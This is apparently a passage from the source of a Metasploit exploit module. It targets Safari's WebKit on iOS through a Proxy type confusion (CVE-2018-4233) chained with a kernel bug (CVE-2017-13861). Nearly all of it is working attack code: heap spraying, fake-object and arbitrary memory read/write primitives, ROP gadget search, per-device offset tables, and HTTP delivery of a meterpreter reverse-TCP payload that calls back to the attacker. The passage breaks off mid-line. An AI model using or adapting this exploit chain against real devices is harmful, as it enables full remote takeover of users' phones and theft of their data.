def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Safari Webkit Proxy Object Type Confusion',\r\n 'Description' => %q{\r\n This module exploits a type confusion bug in the Javascript Proxy object in\r\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\r\n it is possible to run arbitrary JS code during the execution of a CreateThis\r\n operation. This makes it possible to change the structure of e.g. an argument\r\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\r\n\r\n The type confusion leads to the ability to allocate fake Javascript objects,\r\n as well as the ability to find the address in memory of a Javascript object.\r\n This allows us to construct a fake JSCell object that can be used to read\r\n and write arbitrary memory from Javascript. The module then uses a ROP chain\r\n to write the first stage shellcode into executable memory within the Safari\r\n process and kick off its execution.\r\n\r\n The first stage maps the second stage macho (containing CVE-2017-13861) into\r\n executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake\r\n exploit leads to a kernel task port (TFP0) that can read and write arbitrary\r\n kernel memory. The processes credential and sandbox structure in the kernel\r\n is overwritten and the meterpreter payloads code signature hash is added to\r\n the kernels trust cache, allowing Safari to load and execute the (self-signed)\r\n meterpreter payload.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'saelo',\r\n 'niklasb',\r\n 'Ian Beer',\r\n 'siguza',\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-4233'],\r\n ['CVE', '2017-13861'],\r\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\r\n ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],\r\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],\r\n ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],\r\n ],\r\n 'Arch' => ARCH_AARCH64,\r\n 'Platform' => 'apple_ios',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\r\n 'Targets' => [[ 'Automatic', {} ]],\r\n 'DisclosureDate' => 'Mar 15 2018'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\r\n OptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]),\r\n ])\r\n end\r\n\r\n def exploit_data(directory, file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', directory, file\r\n ::File.binread path\r\n end\r\n\r\n def payload_url\r\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\r\n end\r\n\r\n def get_version(user_agent)\r\n if user_agent =~ /OS (.*?) like Mac OS X\\)/\r\n ios_version = Gem::Version.new($1.gsub(\"_\", \".\"))\r\n return ios_version\r\n end\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if request.uri =~ %r{/apple-touch-icon*}\r\n return\r\n elsif request.uri =~ %r{/favicon*}\r\n return\r\n elsif request.uri =~ %r{/payload10$*}\r\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1\r\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\r\n print_good(\"Sent sha1 iOS 10 payload\")\r\n return\r\n elsif request.uri =~ %r{/payload11$*}\r\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib\r\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\r\n print_good(\"Sent sha256 iOS 11 payload\")\r\n return\r\n end\r\n\r\n user_agent = request['User-Agent']\r\n print_status(\"Requesting #{request.uri} from #{user_agent}\")\r\n version = get_version(user_agent)\r\n ios_11 = (version >= Gem::Version.new('11.0.0'))\r\n if request.uri =~ %r{/exploit$}\r\n loader_data = exploit_data('CVE-2017-13861', 'exploit')\r\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\r\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\r\n payload_url_index = loader_data.index('PAYLOAD_URL')\r\n loader_data[payload_url_index, config.length] = config\r\n print_good(\"Sent async_wake exploit\")\r\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\r\n return\r\n end\r\n\r\n get_mem_rw_ios_10 = %Q^\r\nfunction get_mem_rw(stage1) {\r\n var structs = [];\r\n function sprayStructures() {\r\n function randomString() {\r\n return Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5)\r\n }\r\n for (var i = 0; i < 4096; i++) {\r\n var a = new Float64Array(1);\r\n a[randomString()] = 1337;\r\n structs.push(a)\r\n }\r\n }\r\n sprayStructures();\r\n var hax = new Uint8Array(4096);\r\n var jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]);\r\n var container = {\r\n jsCellHeader: jsCellHeader.asJSValue(),\r\n butterfly: false,\r\n vector: hax,\r\n lengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue()\r\n };\r\n var address = Add(stage1.addrof(container), 16);\r\n var fakearray = stage1.fakeobj(address);\r\n while (!(fakearray instanceof Float64Array)) {\r\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\r\n container.jsCellHeader = jsCellHeader.asJSValue()\r\n }\r\n memory = {\r\n read: function(addr, length) {\r\n fakearray[2] = i2f(addr);\r\n var a = new Array(length);\r\n for (var i = 0; i < length; i++) a[i] = hax[i];\r\n return a\r\n },\r\n readInt64: function(addr) {\r\n return new Int64(this.read(addr, 8))\r\n },\r\n write: function(addr, data) {\r\n fakearray[2] = i2f(addr);\r\n for (var i = 0; i < data.length; i++) hax[i] = data[i]\r\n },\r\n writeInt64: function(addr, val) {\r\n return this.write(addr, val.bytes())\r\n },\r\n };\r\n var empty = {};\r\n var header = memory.read(stage1.addrof(empty), 8);\r\n memory.write(stage1.addrof(container), header);\r\n var f64array = new Float64Array(8);\r\n header = memory.read(stage1.addrof(f64array), 16);\r\n memory.write(stage1.addrof(fakearray), header);\r\n memory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]);\r\n fakearray.container = container;\r\n return memory;\r\n}\r\n^\r\n\r\n get_mem_rw_ios_11 = %Q^\r\nfunction get_mem_rw(stage1) {\r\n var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 0x18 : 0x10;\r\n var structure_spray = []\r\n for (var i = 0; i < 1000; ++i) {\r\n var ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff}\r\n ary['prop'+i] = 1\r\n structure_spray.push(ary)\r\n }\r\n var manager = structure_spray[500]\r\n var leak_addr = stage1.addrof(manager)\r\n //print('leaking from: '+ hex(leak_addr))\r\n function alloc_above_manager(expr) {\r\n var res\r\n do {\r\n for (var i = 0; i < ALLOCS; ++i) {\r\n structure_spray.push(eval(expr))\r\n }\r\n res = eval(expr)\r\n } while (stage1.addrof(res) < leak_addr)\r\n return res\r\n }\r\n var unboxed_size = 100\r\n var unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']')\r\n var boxed = alloc_above_manager('[{}]')\r\n var victim = alloc_above_manager('[]')\r\n // Will be stored out-of-line at butterfly - 0x10\r\n victim.p0 = 0x1337\r\n function victim_write(val) {\r\n victim.p0 = val\r\n }\r\n function victim_read() {\r\n return victim.p0\r\n }\r\n i32[0] = 0x200 // Structure ID\r\n i32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing\r\n var outer = {\r\n p0: 0, // Padding, so that the rest of inline properties are 16-byte aligned\r\n p1: f64[0],\r\n p2: manager,\r\n p3: 0xfffffff, // Butterfly indexing mask\r\n }\r\n var fake_addr = stage1.addrof(outer) + FPO + 0x8;\r\n //print('fake obj @ ' + hex(fake_addr))\r\n var unboxed_addr = stage1.addrof(unboxed)\r\n var boxed_addr = stage1.addrof(boxed)\r\n var victim_addr = stage1.addrof(victim)\r\n //print('leak ' + hex(leak_addr)\r\n //+ ' unboxed ' + hex(unboxed_addr)\r\n //+ ' boxed ' + hex(boxed_addr)\r\n //+ ' victim ' + hex(victim_addr))\r\n var holder = {fake: {}}\r\n holder.fake = stage1.fakeobj(fake_addr)\r\n // From here on GC would be uncool\r\n // Share a butterfly for easier boxing/unboxing\r\n var shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8])\r\n var boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8]\r\n holder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly)\r\n var victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8]\r\n function set_victim_addr(where) {\r\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10)\r\n }\r\n function reset_victim_addr() {\r\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly\r\n }\r\n var stage2 = {\r\n addrof: function(victim) {\r\n boxed[0] = victim\r\n return f2i(unboxed[0])\r\n },\r\n fakeobj: function(addr) {\r\n unboxed[0] = i2f(addr)\r\n return boxed[0]\r\n },\r\n write64: function(where, what) {\r\n set_victim_addr(where)\r\n victim_write(this.fakeobj(what))\r\n reset_victim_addr()\r\n },\r\n read64: function(where) {\r\n set_victim_addr(where)\r\n var res = this.addrof(victim_read())\r\n reset_victim_addr()\r\n return res;\r\n },\r\n write_non_zero: function(where, values) {\r\n for (var i = 0; i < values.length; ++i) {\r\n if (values[i] != 0)\r\n this.write64(where + i*8, values[i])\r\n }\r\n },\r\n readInt64: function(where) {\r\n if (where instanceof Int64) {\r\n where = Add(where, 0x10);\r\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble();\r\n } else {\r\n set_victim_addr(where);\r\n }\r\n boxed[0] = victim_read();\r\n var res = f2i(unboxed[0]);\r\n reset_victim_addr();\r\n return new Int64(res);\r\n },\r\n read: function(addr, length) {\r\n var address = new Int64(addr);\r\n var a = new Array(length);\r\n var i;\r\n\r\n for (i = 0; i + 8 < length; i += 8) {\r\n v = this.readInt64(Add(address, i)).bytes()\r\n for (var j = 0; j < 8; j++) {\r\n a[i+j] = v[j];\r\n }\r\n }\r\n\r\n v = this.readInt64(Add(address, i)).bytes()\r\n for (var j = i; j < length; j++) {\r\n a[j] = v[j - i];\r\n }\r\n\r\n return a\r\n },\r\n test: function() {\r\n this.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie\r\n if (0xfff != this.read64(boxed_addr + 0x10)) {\r\n fail(2)\r\n }\r\n },\r\n }\r\n // Test read/write\r\n stage2.test()\r\n return stage2;\r\n}\r\n^\r\n\r\n get_mem_rw = (version >= Gem::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10\r\n utils = exploit_data \"CVE-2018-4233\", \"utils.js\"\r\n int64 = exploit_data \"CVE-2018-4233\", \"int64.js\"\r\n dump_offsets = ''\r\n if datastore['DUMP_OFFSETS']\r\n dump_offsets = %Q^\r\n var offsetstr = uuid + \" : { \";\r\n var offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\",\r\n \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ];\r\n for (var i = 0; i < offsetarray.length; i++) {\r\n var offset = offsets[offsetarray[i]];\r\n if (offset) {\r\n var offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\");\r\n offsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \";\r\n }\r\n }\r\n offsetstr += \"}, \";\r\n prompt(\"offsets: \", offsetstr);\r\n^\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<body>\r\n<script>\r\n\r\n#{utils}\r\n#{int64}\r\n\r\nprint = alert;\r\nITERS = 1E4;\r\nALLOCS = 1E3;\r\n\r\nvar conversion_buffer = new ArrayBuffer(8);\r\nvar f64 = new Float64Array(conversion_buffer);\r\nvar i32 = new Uint32Array(conversion_buffer);\r\nvar BASE32 = 0x100000000;\r\n\r\nfunction f2i(f) {\r\n f64[0] = f;\r\n return i32[0] + BASE32 * i32[1];\r\n}\r\n\r\nfunction i2f(i) {\r\n i32[0] = i % BASE32;\r\n i32[1] = i / BASE32;\r\n return f64[0];\r\n}\r\n\r\nfunction hexit(x) {\r\n if (x instanceof Int64) return x.toString();\r\n if (x < 0) return \"-\" + hex(-x);\r\n return \"0x\" + x.toString(16);\r\n}\r\n\r\nfunction fail(x) {\r\n print('FAIL ' + x);\r\n location.reload();\r\n throw null;\r\n}\r\n\r\ncounter = 0;\r\n\r\n// CVE-2018-4233\r\nfunction trigger(constr, modify, res, val) {\r\n return eval(`\r\n var o = [13.37]\r\n var Constructor${counter} = function(o) { ${constr} }\r\n var hack = false\r\n var Wrapper = new Proxy(Constructor${counter}, {\r\n get: function() {\r\n if (hack) {\r\n ${modify}\r\n }\r\n }\r\n })\r\n for (var i = 0; i < ITERS; ++i)\r\n new Wrapper(o)\r\n hack = true\r\n var bar = new Wrapper(o)\r\n ${res}\r\n `)\r\n}\r\n\r\nvar workbuf = new ArrayBuffer(0x1000000);\r\nvar payload = new Uint8Array(workbuf);\r\n\r\nfunction pwn() {\r\n var stage1 = {\r\n addrof: function(victim) {\r\n return f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim))\r\n },\r\n fakeobj: function(addr) {\r\n return trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr))\r\n },\r\n test: function() {\r\n var addr = this.addrof({\r\n a: 4919\r\n });\r\n var x = this.fakeobj(addr);\r\n if (x.a != 4919) fail(\"stage1\")\r\n }\r\n };\r\n stage1.test();\r\n\r\n var stage2 = get_mem_rw(stage1);\r\n var FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"}\r\n var memory = stage2;\r\n memory.u32 = _u32;\r\n\r\n var wrapper = document.createElement(\"div\");\r\n var wrapper_addr = stage1.addrof(wrapper);\r\n var el_addr = memory.readInt64(wrapper_addr + FPO);\r\n var vtab = memory.readInt64(el_addr);\r\n\r\n var anchor = memory.readInt64(vtab);\r\n var hdr = Sub(anchor, anchor.lo() & 0xfff);\r\n var b = [];\r\n while(true)\r\n {\r\n if (memory.readInt64(hdr).lo() == 4277009104) {\r\n fail('WebCore ' + hdr + ' post spectre support coming soon');\r\n }\r\n if(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\"))\r\n {\r\n break;\r\n }\r\n hdr = Sub(hdr, 0x1000);\r\n }\r\n\r\n var base_seg = null;\r\n var nsegs = memory.u32(Add(hdr, 0x14));\r\n var segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20);\r\n var segs = [];\r\n for(var i = 0; i < nsegs; ++i)\r\n {\r\n var off = i * 0x20;\r\n var seg =\r\n {\r\n addr: new Int64(segdata.slice(off + 0x0, off + 0x8)),\r\n size: new Int64(segdata.slice(off + 0x8, off + 0x10)),\r\n fileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)),\r\n maxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)),\r\n initprot: b2u32(segdata.slice(off + 0x1c, off + 0x20))\r\n };\r\n segs.push(seg);\r\n if(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0))\r\n {\r\n base_seg = seg;\r\n }\r\n }\r\n if(base_seg == null)\r\n {\r\n fail(\"base_seg\");\r\n }\r\n\r\n var cache_slide = Sub(hdr, base_seg.addr);\r\n var uuid = memory.readInt64(Add(hdr, 0x58)).lo();\r\n var offset_cache = {\r\n // iPod Touch 10.1.1\r\n 788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc,\r\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, },\r\n\r\n // iPhone 5S 10.2.1\r\n 3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc,\r\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, },\r\n\r\n // iPhone 6S 11.0.3\r\n 425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c,\r\n \"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, },\r\n };\r\n\r\n var offsets = offset_cache[uuid];\r\n if (offsets)\r\n {\r\n var k = Object.keys(offsets);\r\n for(var i = 0; i < k.length; ++i)\r\n {\r\n var s = k[i];\r\n offsets[s] = Add(offsets[s], cache_slide);\r\n }\r\n }\r\n else\r\n {\r\n var syms = {};\r\n var gadgets = {};\r\n\r\n for(var i = 0; i < segs.length; ++i)\r\n {\r\n segs[i].addr = Add(segs[i].addr, cache_slide);\r\n }\r\n var libs =\r\n {\r\n \"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"],\r\n #{ ios_11 ? '\r\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"],\r\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"],\r\n ' : '\r\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"],\r\n \"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"],\r\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"],\r\n '}\r\n }\r\n\r\n #{ ios_11 ? '\r\n var opcodes = {\r\n // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret\r\n \"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],\r\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\r\n \"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ],\r\n // mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8\r\n \"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ],\r\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\r\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\r\n \"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ],\r\n // mov x4, x20 ; blr x8\r\n \"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ],\r\n }\r\n var opcode_libs = [\r\n \"/usr/lib/PN548.dylib\", // dispatch, stackloader\r\n \"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader\r\n ];\r\n\r\n ' : '\r\n var opcodes = {\r\n // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28\r\n \"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],\r\n \"dispatch\": [\r\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\r\n [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ],\r\n // blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret\r\n [ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ],\r\n ],\r\n \"stackloader\": [\r\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\r\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\r\n [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ],\r\n // sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30];\r\n // ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret\r\n [ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ],\r\n ],\r\n };\r\n\r\n var opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ];\r\n '}\r\n\r\n var imgs = Add(hdr, memory.u32(Add(hdr, 0x18)));\r\n var nimgs = memory.u32(Add(hdr, 0x1c));\r\n for(var i = 0; i < nimgs; ++i)\r\n {\r\n var straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18)));\r\n var fn = function(i)\r\n {\r\n return memory.read(Add(straddr, i), 1)[0];\r\n };\r\n var base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide);\r\n if(opcode_libs.some(lib => strcmp(fn, lib)))\r\n {\r\n var ncmds = memory.u32(Add(base, 0x10));\r\n for(var j = 0, off = 0x20; j < ncmds; ++j)\r\n {\r\n var cmd = memory.u32(Add(base, off));\r\n if(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64\r\n {\r\n var nsects = memory.u32(Add(base, off + 0x40));\r\n for(var k = 0, o = off + 0x48; k < nsects; ++k)\r\n {\r\n if(strcmp(memory.read(Add(base, o), 0x10), \"__text\"))\r\n {\r\n var keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k])\r\n if (keys.length == 0) break;\r\n\r\n var addr = Add(memory.readInt64(Add(base, o + 0x20)), cache_slide)\r\n var size = memory.u32(Add(base, o + 0x28))\r\n\r\n // Copy the entire __text region into a Uint32Array for faster processing.\r\n // Previously you could map a Uint32Array over the data, but on i7+ devices\r\n // this caused access violations.\r\n // Instead we read the entire region and copy it into a Uint32Array. The\r\n // memory.read primitive has a weird limitation where it's only able to read\r\n // up to 4096 bytes. to get around this we'll read multiple times and combine\r\n // them into one.\r\n\r\n var allData = new Uint32Array(size / 4)\r\n for (var r = 0; r < size; r += 4096) {\r\n // Check to ensure we don't read out of the region we want\r\n var qty = 4096\r\n if (size - r < qty) {\r\n qty = size - r\r\n }\r\n var data = memory.read(Add(addr, r), qty)\r\n\r\n // Data is an array of single bytes. This code takes four entries\r\n // and converts them into a single 32-bit integer. It then adds it\r\n // into the `allData` array at the given index\r\n for (var h = 0; h < qty; h += 4) {\r\n var fourBytes = b2u32(data.slice(h, h + 4))\r\n allData[(r + h) / 4] = fourBytes\r\n }\r\n }\r\n\r\n // Loop through the entire data map looking for each gadget we need\r\n for (var f = 0; f < size && keys.length > 0; f++) {\r\n\r\n // Check every gadget\r\n for (var z = 0; z < keys.length; z++) {\r\n var key = keys[z];\r\n var opcode_list = opcodes[key];\r\n for (var y = 0; y < opcode_list.length; y++) {\r\n var opcode = opcode_list[y];\r\n for (var t = 0; t < opcode.length; t++) {\r\n var op = allData[f+t];\r\n if (op == opcode[t]) {\r\n if (t == opcode.length - 1) {\r\n gadgets[key] = Add(addr, f*4);\r\n keys.splice(z, 1);\r\n z = keys.length;\r\n break;\r\n }\r\n continue;\r\n }\r\n break;\r\n }\r\n }\r\n }\r\n }\r\n\r\n break;\r\n }\r\n o += 0x50;\r\n }\r\n break;\r\n }\r\n off += memory.u32(Add(base, off + 0x4));\r\n }\r\n continue;\r\n }\r\n var lookup = null;\r\n for(var k = Object.keys(libs), j = 0; j < k.length; ++j)\r\n {\r\n if(strcmp(fn, k[j]))\r\n {\r\n lookup = libs[k[j]];\r\n break;\r\n }\r\n }\r\n if(lookup != null)\r\n {\r\n fsyms(memory, base, segs, lookup, syms);\r\n }\r\n }\r\n\r\n var vals = Object.keys(libs).map(function(key) {\r\n return libs[key];\r\n });\r\n var k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []);\r\n for(var i = 0; i < k.length; ++i)\r\n {\r\n var s = k[i];\r\n if(syms[s] == null)\r\n {\r\n fail(s);\r\n }\r\n syms[s] = Add(syms[s], cache_slide);\r\n }\r\n k = Object.keys(opcodes);\r\n for(var i = 0; i < k.length; ++i)\r\n {\r\n var s = k[i];\r\n if(gadgets[s] == null)\r\n {\r\n fail(s);\r\n }\r\n }\r\n\r\n offsets = {}\r\n offsets[\"regloader\"] = gadgets[\"regloader\"];\r\n offsets[\"dispatch\"] = gadgets[\"dispatch\"];\r\n offsets[\"stackloader\"] = gadgets[\"stackloader\"];\r\n offsets[\"ldrx8\"] = gadgets[\"ldrx8\"];\r\n offsets[\"movx4\"] = gadgets[\"movx4\"];\r\n offsets[\"__longjmp\"] = syms[\"__longjmp\"];\r\n offsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"];\r\n offsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"];\r\n offsets[\"_dlopen\"] = syms[\"_dlopen\"];\r\n offsets[\"_dlsym\"] = syms[\"_dlsym\"];\r\n offsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"];\r\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\r\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\r\n offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"];\r\n\r\n if (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) {\r\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8);\r\n }\r\n #{ ios_11 ? '\r\n if (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) {\r\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8);\r\n }' : ''}\r\n\r\n#{dump_offsets}\r\n\r\n }\r\n\r\n\r\n var regloader = offsets[\"regloader\"];\r\n var dispatch = offsets[\"dispatch\"];\r\n var stackloader = offsets[\"stackloader\"];\r\n var longjmp = offsets[\"__longjmp\"];\r\n var mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"];\r\n var memmove = offsets[\"__platform_memmove\"];\r\n var dlopen = offsets[\"_dlopen\"];\r\n var dlsym = offsets[\"_dlsym\"];\r\n var task_self = offsets[\"_mach_task_self_\"]\r\n var endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\r\n var startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\r\n\r\n var ldrx8 = offsets[\"ldrx8\"]; // might be null\r\n var movx4 = offsets[\"movx4\"]; // might be null\r\n\r\n var mach_task_self_ = new Int64(memory.readInt64(task_self).lo());\r\n var memPoolEnd = memory.readInt64(endOfFixedMem);\r\n\r\n var memPoolStart = Int64.Zero;\r\n if (startOfFixedMem) {\r\n memPoolStart = memory.readInt64(startOfFixedMem);\r\n }\r\n\r\n var jitWriteSeparateHeaps = Int64.Zero;\r\n if (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) {\r\n jitWriteSeparateHeaps = 